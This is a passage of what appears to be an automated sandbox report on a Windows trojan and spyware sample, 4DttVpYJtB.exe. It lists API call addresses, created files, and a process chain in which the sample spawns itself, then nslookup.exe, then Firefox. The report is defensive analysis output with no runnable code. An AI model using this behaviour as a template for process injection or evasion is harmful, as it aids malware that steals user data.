            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652B00 NtQueryValueKey,6_2_03652B00
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652B10 NtAllocateVirtualMemory,6_2_03652B10
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652BE0 NtQueryVirtualMemory,6_2_03652BE0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652AC0 NtEnumerateValueKey,6_2_03652AC0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652AA0 NtQueryInformationFile,6_2_03652AA0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036529D0 NtWaitForSingleObject,6_2_036529D0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652F30 NtOpenDirectoryObject,6_2_03652F30
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652FB0 NtSetValueKey,6_2_03652FB0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652E00 NtQueueApcThread,6_2_03652E00
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652EC0 NtQuerySection,6_2_03652EC0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652ED0 NtResumeThread,6_2_03652ED0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652EB0 NtProtectVirtualMemory,6_2_03652EB0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652E80 NtCreateProcessEx,6_2_03652E80
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652D50 NtWriteVirtualMemory,6_2_03652D50
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652DC0 NtAdjustPrivilegesToken,6_2_03652DC0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652DA0 NtReadVirtualMemory,6_2_03652DA0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652C50 NtUnmapViewOfSection,6_2_03652C50
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652C20 NtSetInformationFile,6_2_03652C20
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652C10 NtOpenProcess,6_2_03652C10
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652CD0 NtEnumerateKey,6_2_03652CD0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036538D0 NtGetContextThread,6_2_036538D0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03653C30 NtOpenProcessToken,6_2_03653C30
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03653C90 NtOpenThread,6_2_03653C90
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B99450 NtCreateFile,6_2_00B99450
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B995C0 NtReadFile,6_2_00B995C0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B996B0 NtDeleteFile,6_2_00B996B0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B99750 NtClose,6_2_00B99750
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 2_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_00403640
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 2_2_00406D5F2_2_00406D5F
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 2_2_73131BFF2_2_73131BFF
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DD62C4_2_370DD62C
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370ED6464_2_370ED646
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B36EC4_2_370B36EC
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370FF6F64_2_370FF6F6
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370FF5C94_2_370FF5C9
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370F75C64_2_370F75C6
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370AD4804_2_370AD480
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370FF3304_2_370FF330
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370313804_2_37031380
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705D2104_2_3705D210
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370F124C4_2_370F124C
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702D2EC4_2_3702D2EC
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3702F1134_2_3702F113
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DD1304_2_370DD130
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3708717A4_2_3708717A
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370451C04_2_370451C0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705B1E04_2_3705B1E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3707508C4_2_3707508C
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3704B0D04_2_3704B0D0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370F70F14_2_370F70F1
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370BFF404_2_370BFF40
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370FFF634_2_370FFF63
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370F1FC64_2_370F1FC6
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37041EB24_2_37041EB2
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370F9ED24_2_370F9ED2
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370FFD274_2_370FFD27
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370F7D4C4_2_370F7D4C
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37049DD04_2_37049DD0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DFDF44_2_370DFDF4
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370D9C984_2_370D9C98
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370C7CE84_2_370C7CE8
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705FCE04_2_3705FCE0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3707DB194_2_3707DB19
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370FFB2E4_2_370FFB2E
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370FFA894_2_370FFA89
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705FAA04_2_3705FAA0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370859C04_2_370859C0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370438004_2_37043800
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370498704_2_37049870
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705B8704_2_3705B870
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B58704_2_370B5870
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370FF8724_2_370FF872
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B98B24_2_370B98B2
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370F18DA4_2_370F18DA
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370F78F34_2_370F78F3
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370F67574_2_370F6757
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3704A7604_2_3704A760
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370427604_2_37042760
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705C6004_2_3705C600
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370646704_2_37064670
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370406804_2_37040680
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370FA6C04_2_370FA6C0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703C6E04_2_3703C6E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3710A5264_2_3710A526
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370404454_2_37040445
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3704E3104_2_3704E310
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3710010E4_2_3710010E
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370EE0764_2_370EE076
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370300A04_2_370300A0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3704CF004_2_3704CF00
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370FEFBF4_2_370FEFBF
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37046FE04_2_37046FE0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37082E484_2_37082E48
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37060E504_2_37060E50
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370E0E6D4_2_370E0E6D
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370F0EAD4_2_370F0EAD
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37032EE84_2_37032EE8
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703AD004_2_3703AD00
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37040D694_2_37040D69
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37052DB04_2_37052DB0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37030C124_2_37030C12
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3704AC204_2_3704AC20
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370BEC204_2_370BEC20
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370EEC4C4_2_370EEC4C
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370F6C694_2_370F6C69
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370FEC604_2_370FEC60
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37058CDF4_2_37058CDF
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3710ACEB4_2_3710ACEB
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37040B104_2_37040B10
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370B4BC04_2_370B4BC0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370FCA134_2_370FCA13
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370FEA5B4_2_370FEA5B
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703E9A04_2_3703E9A0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370FE9A64_2_370FE9A6
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3706E8104_2_3706E810
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370E08354_2_370E0835
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370268684_2_37026868
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370568824_2_37056882
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370428C04_2_370428C0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0362E3106_2_0362E310
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_035E22456_2_035E2245
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036E010E6_2_036E010E
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036CE0766_2_036CE076
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036100A06_2_036100A0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036227606_2_03622760
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0362A7606_2_0362A760
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036D67576_2_036D6757
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036446706_2_03644670
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0363C6006_2_0363C600
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0361C6E06_2_0361C6E0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036DA6C06_2_036DA6C0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036206806_2_03620680
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036EA5266_2_036EA526
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036204456_2_03620445
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03620B106_2_03620B10
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03694BC06_2_03694BC0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036DEA5B6_2_036DEA5B
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036DCA136_2_036DCA13
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0361E9A06_2_0361E9A0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036DE9A66_2_036DE9A6
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036068686_2_03606868
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036C08356_2_036C0835
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0364E8106_2_0364E810
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036228C06_2_036228C0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036368826_2_03636882
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0362CF006_2_0362CF00
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03626FE06_2_03626FE0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036DEFBF6_2_036DEFBF
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036C0E6D6_2_036C0E6D
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03662E486_2_03662E48
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03640E506_2_03640E50
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03612EE86_2_03612EE8
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036D0EAD6_2_036D0EAD
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03620D696_2_03620D69
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0361AD006_2_0361AD00
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03632DB06_2_03632DB0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036D6C696_2_036D6C69
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036DEC606_2_036DEC60
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036CEC4C6_2_036CEC4C
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0362AC206_2_0362AC20
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0369EC206_2_0369EC20
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03610C126_2_03610C12
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036EACEB6_2_036EACEB
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03638CDF6_2_03638CDF
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036DF3306_2_036DF330
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036113806_2_03611380
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036D124C6_2_036D124C
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0363D2106_2_0363D210
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0360D2EC6_2_0360D2EC
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0366717A6_2_0366717A
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036BD1306_2_036BD130
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0360F1136_2_0360F113
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0363B1E06_2_0363B1E0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036251C06_2_036251C0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036D70F16_2_036D70F1
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0362B0D06_2_0362B0D0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0365508C6_2_0365508C
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036CD6466_2_036CD646
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036BD62C6_2_036BD62C
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036936EC6_2_036936EC
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036DF6F66_2_036DF6F6
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036DF5C96_2_036DF5C9
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036D75C66_2_036D75C6
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0368D4806_2_0368D480
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036B54906_2_036B5490
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036DFB2E6_2_036DFB2E
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0365DB196_2_0365DB19
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036B1B806_2_036B1B80
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0363FAA06_2_0363FAA0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036DFA896_2_036DFA89
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036659C06_2_036659C0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_035E99E86_2_035E99E8
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036298706_2_03629870
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0363B8706_2_0363B870
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036958706_2_03695870
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036DF8726_2_036DF872
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036238006_2_03623800
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036D78F36_2_036D78F3
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036D18DA6_2_036D18DA
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036998B26_2_036998B2
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036DFF636_2_036DFF63
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0369FF406_2_0369FF40
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036D1FC66_2_036D1FC6
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036D9ED26_2_036D9ED2
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03621EB26_2_03621EB2
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036D7D4C6_2_036D7D4C
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036DFD276_2_036DFD27
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036BFDF46_2_036BFDF4
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03629DD06_2_03629DD0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036A7CE86_2_036A7CE8
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0363FCE06_2_0363FCE0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036B9C986_2_036B9C98
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B820206_2_00B82020
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B7B0B06_2_00B7B0B0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B7D0D06_2_00B7D0D0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B7B1F46_2_00B7B1F4
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B7B2006_2_00B7B200
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B856C06_2_00B856C0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B838996_2_00B83899
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B838E06_2_00B838E0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B9BD506_2_00B9BD50
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_00B7CEB06_2_00B7CEB0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0393D7F86_2_0393D7F8
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0393CA076_2_0393CA07
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_0393CA2D6_2_0393CA2D
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: String function: 370BEF10 appears 105 times
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: String function: 37075050 appears 37 times
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: String function: 37087BE4 appears 97 times
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: String function: 370AE692 appears 86 times
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: String function: 3702B910 appears 257 times
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: String function: 03655050 appears 57 times
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: String function: 03667BE4 appears 99 times
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: String function: 0368E692 appears 86 times
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: String function: 0360B910 appears 260 times
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: String function: 0369EF10 appears 105 times
            Source: 4DttVpYJtB.exe, 00000002.00000002.396467338527.000000000045A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamestungen explorer.exer) vs 4DttVpYJtB.exe
            Source: 4DttVpYJtB.exe, 00000004.00000003.396625736882.0000000036DB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 4DttVpYJtB.exe
            Source: 4DttVpYJtB.exe, 00000004.00000002.396747642012.00000000372D0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 4DttVpYJtB.exe
            Source: 4DttVpYJtB.exe, 00000004.00000003.396687305952.0000000036DE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenslookup.exej% vs 4DttVpYJtB.exe
            Source: 4DttVpYJtB.exe, 00000004.00000003.396687185256.0000000006F53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenslookup.exej% vs 4DttVpYJtB.exe
            Source: 4DttVpYJtB.exe, 00000004.00000002.396747642012.000000003712D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 4DttVpYJtB.exe
            Source: 4DttVpYJtB.exe, 00000004.00000003.396629911309.0000000036F79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 4DttVpYJtB.exe
            Source: 4DttVpYJtB.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/24@19/16
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 2_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_00403640
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 2_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,2_2_00404AB5
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 2_2_004021AA CoCreateInstance,2_2_004021AA
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeFile created: C:\Program Files (x86)\Common Files\metricateJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeFile created: C:\Users\user\AppData\Local\Corydora.iniJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeFile created: C:\Users\user\AppData\Local\Temp\nsp5055.tmpJump to behavior
            Source: 4DttVpYJtB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 4DttVpYJtB.exeReversingLabs: Detection: 47%
            Source: 4DttVpYJtB.exeVirustotal: Detection: 68%
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeFile read: C:\Users\user\Desktop\4DttVpYJtB.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\4DttVpYJtB.exe "C:\Users\user\Desktop\4DttVpYJtB.exe"
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeProcess created: C:\Users\user\Desktop\4DttVpYJtB.exe "C:\Users\user\Desktop\4DttVpYJtB.exe"
            Source: C:\Program Files (x86)\VzkvEFoeeutBCiNOgMNeWVeketbHNftcLthoiRTUYCPPDPVICvliBaXEIaTlKyXnfIhitiQY\29u7VPL5EWJRQ9.exeProcess created: C:\Windows\SysWOW64\nslookup.exe "C:\Windows\SysWOW64\nslookup.exe"
            Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeProcess created: C:\Users\user\Desktop\4DttVpYJtB.exe "C:\Users\user\Desktop\4DttVpYJtB.exe"Jump to behavior
            Source: C:\Program Files (x86)\VzkvEFoeeutBCiNOgMNeWVeketbHNftcLthoiRTUYCPPDPVICvliBaXEIaTlKyXnfIhitiQY\29u7VPL5EWJRQ9.exeProcess created: C:\Windows\SysWOW64\nslookup.exe "C:\Windows\SysWOW64\nslookup.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: edgegdi.dllJump to behavior
